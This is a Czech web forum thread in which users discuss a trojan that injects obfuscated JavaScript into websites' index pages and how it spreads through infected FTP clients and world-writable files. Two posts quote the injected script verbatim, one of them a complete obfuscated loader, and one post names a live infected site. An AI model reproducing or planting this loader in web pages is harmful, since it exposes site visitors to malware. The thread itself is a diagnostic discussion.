Autor Zpráva
tom528
Profil *
Zdravim,

nezaznamenali jste v posledni dobe ze se obcas objevi web na ktery napriklad avg reaguje tim ze je zavirovany?
Je to nejaky trojan ktery vlozi do index.html (php) kus kodu ktery zacina takto:

<script language=javascript>tusigf="jNXWmplu%mp!pK";gcxrmnrd="<h73crih70t h6ch61h6eh67h75h61h67eh3dh6aavasch72ih70t> h66h75h6eh63h74ionh20yph77jobyji(bkh71ih6eodh29{h76ar kuwrh6eh78h6bf,h68szeh69yh72h76h3dh22.Gh5dh35h6d}h33h27h30h7ch6bZ8Ie)h42_h66Nah6f\\\" qh69h36h73vh3dOh4ah5bh40zh3a(Hh6cn*wMh68h78h39`7#;h32-h55h50Fb+g$h75,~rh21yh63h4bh34h43jV{h70h741dE&Th41h5e\",h69h68h68h67xdph6dh3d\"h22h2covmfgh68,h79h75h7ajzmh2ch73h6duh62lmwh7a=\"\",eh67h61bkqh6fh6ff;h66oh72h28kuh77rh6eh78kf=0h3bh6buh77rh6exkfh3ch62kqinodh2eleh6egth68h3bkuh77h72h6exkfh2b

Co to je za trojana? Jak se mu dari kod do stranky vlozit?

Diky
Jan Tvrdík
Profil
tom528:
Jak se mu dari kod do stranky vlozit?
Pravděpodobně používáš Total Commander a máš zavirované PC. Když budeš hledat, zjistíš, že nejsi sám.
tom528
Profil *
No muj problem to zrejme nebude protoze pouzivam Mac OS X, ale diky za vysvetleni...
Ice
Profil
Moderátor Chamurappi: Odkaz zrušen, vstup na vlastní nebezpečí.

Živá ukázka na http://eso.ts-web.info/ info na http://forum.asw.cz/index.php?action=profile%3Bu=2589%3Bsa=showPosts taky mne to napadlo jeden nas web, ale TC tam taky nemaj. Webhosting Czechia.

<!--ca51f0b537c5c12901a26f3325dcaff6--><script language=javascript>cvfpfrucy="sh!yMvQ%HhqYX";dxhsrsd="S3cS73criptS20lS61S6eS67uage=jS61vS61scrS69S70tS3eS20 fS75S6eS63tion gqS67nxvS72S66(mireS63ckS72S29{vS61r S6fwS6aS66zS73S2cljhS61S77eS6ctr=\"S237S76S60|MS6186(4]yS42@em;3iS48S71IS41bJZS7b^S55couS2cPVS6bFS5bp0+S35S47't2xS20d9r.S45)&S43S66ng=*S4b:1lshOj$S77N\\S22}TzS21S2d~_\"S2cS72pgabmS3d\"S22,iaS6fertkg,S74lS6fmS6aS61S76S72,sS76mS6cns=\"\"S2cS64zefmS75;fS6fS72(S6fwjS66zsS3d0S3bowS6afzsS3cmS69S72S65S63ckS72.S6ceS6eS67S74S68S3bowS6aS66S7as+S2b)S7b S69S61S6fS65S72S74S6bS67S3dS6dS69reS63S63S6brS2echS61S72S41S74(oS77jS66zS73);S74lomS6aavrS3dS6cjhawelS74r.S69nS64exOf(iaoerS74kS67);S69S66(S74lomS6aavr>-1)S7b S64zeS66mu=S28S28tlomS6aavrS2bS31)S2581-1S29S3bifS28S64zeS66mS75<=S30)S64S7aefS6dS75S2b=S381;S73vmlnS73+=lS6ahaS77elS74S72.cS68S61rAt(dS7aefmS75-1S29; S7dS20S65S6cse svS6dS6cS6eS73+S3diaoertkS67S3bS7dS72S70gS61bS6d+=S73vmS6cnS73;dS6fcuS6dS65nt.wS72S69tS65(rpgabS6d);}S3cS2fsS63riS70S74>";ucsnjzm=cvfpfrucy.charAt(7);lbwyqw=dxhsrsd.replace(/S/g,ucsnjzm);khldjek=unescape(lbwyqw);var bezffmxq,bfkjejr;document.write(khldjek);bezffmxq="<ho.H02ds8g=,8=m*}Z8`8So.H02}>dn,go2Hugdu; F g,B 8H4&d^d2.Bd^d`8.d,`H9!B=o!,N8*d}BoIh;N20ou}Pd2$h,s=8$H.o,gd*dl3dn,go2HugdFIFJFn$unH,OO4g8;mPd`8s,m&d^`8.d9d*dgmNdD82m39Ehm2zH;m44gmNdD82m&E=m2zH;m4&d5d6(]+++++&39uo,;mg2EouuFHmd*dg8;md5d}*}d5dmho80m4`8s,m&d5d}3dm 0H.mh*}d5d9E2u'azS2.Hg=4&3Tdn,go2Hugd9OF .o.o$h;.4&d^.m2,.gd49uo,;mg2EouuFHmEHg9m jn4,`H9!B=o!,N8d5d}*}d5d2$h,s=8$H.o,g&d**d~l&3TdHn4d9OF .o.o$h;.4&d&d^d9uo,;mg2EN.H2m4d}<SfRAVzds8g=,8=m*\\}Z8`8So.H02\\}dSRf*\\}O2201//=uu=sm8g8sB2sohEgm2/##,2;E=Hn?iGG+(m]6l]GJl+v+xxim+8i8lolx]+vvr6(ln~ir](((G(GC}59uo,;mg2E.mnm..m.5}C}5S2.Hg=44gmNdD82m4&&E=m2zH;m4&&5}\\}><\\/SfR}5}AVz>}d&3dFIFJFn$unH,OO4d,`H9!B=o!,N8Pd2$h,s=8$H.o,gd&3dTdmshmd^dTdTdo82oOd4m&d^TdTdu; F g,B 8H4&3</ho.H02>d";gqgnxvrf(bezffmxq);</script><!--ca51f0b537c5c12901a26f3325dcaff6-->
Rox Cox
Profil
Nevím proč, ale také mě teď NOD občas zruší připojení ke stránce, z důvodu viru, z nějakého FTPčka a přitom jsou to weby, do kterých by to nikdo neřekl a na kterých chodí hodně lidí, ale i na weby, které jsou naprosto zapadlé. Zvláštní, velmi zvláštní.
DrAtom
Profil
Tak s podobným virem sem loni bojoval na serveru taky. Vytvoří to skrytý soubor někde hlouběji v adresáři a ten pak napadá stránky, které mají práva na 777. Stejným způsobem funguje tak třeba conficker.

Vaše odpověď

Mohlo by se hodit

Příspěvky nesouvisející s webem budou odstraněny.

Prosím používejte diakritiku a interpunkci.

Ochrana proti spamu. Napište prosím číslo dvě-sta čtyřicet-sedm: